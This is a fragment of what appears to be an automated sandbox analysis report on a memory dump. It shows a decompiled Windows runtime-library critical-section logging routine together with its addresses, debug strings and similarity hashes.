				return E03735720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                    0x0373fdda
                                                                                                    0x0373fde2
                                                                                                    0x0373fde5
                                                                                                    0x0373fdec
                                                                                                    0x0373fdfa
                                                                                                    0x0373fdff
                                                                                                    0x0373fe0a
                                                                                                    0x0373fe0f
                                                                                                    0x0373fe17
                                                                                                    0x0373fe1e
                                                                                                    0x0373fe19
                                                                                                    0x0373fe19
                                                                                                    0x0373fe19
                                                                                                    0x0373fe20
                                                                                                    0x0373fe21
                                                                                                    0x0373fe22
                                                                                                    0x0373fe25
                                                                                                    0x0373fe40

                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0373FDFA
                                                                                                    Strings
                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0373FE01
                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0373FE2B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597959759.0000000003680000.00000040.00000001.sdmp, Offset: 03680000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.598212454.000000000379B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 0000000A.00000002.598221792.000000000379F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                    • API String ID: 885266447-3903918235
                                                                                                    • Opcode ID: a21137426065cd77feec18eb3cb6a96b9a67844c95d618cf9d89195e8420ca57
                                                                                                    • Instruction ID: 56697be2166e5d643cd940ff32816a3bde6c645e23d980d796d34e52341966c4
                                                                                                    • Opcode Fuzzy Hash: a21137426065cd77feec18eb3cb6a96b9a67844c95d618cf9d89195e8420ca57
                                                                                                    • Instruction Fuzzy Hash: 8CF02176640605BFEA209A45DC06F33BF5EDB46770F140319F624591D2D962F83097F4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%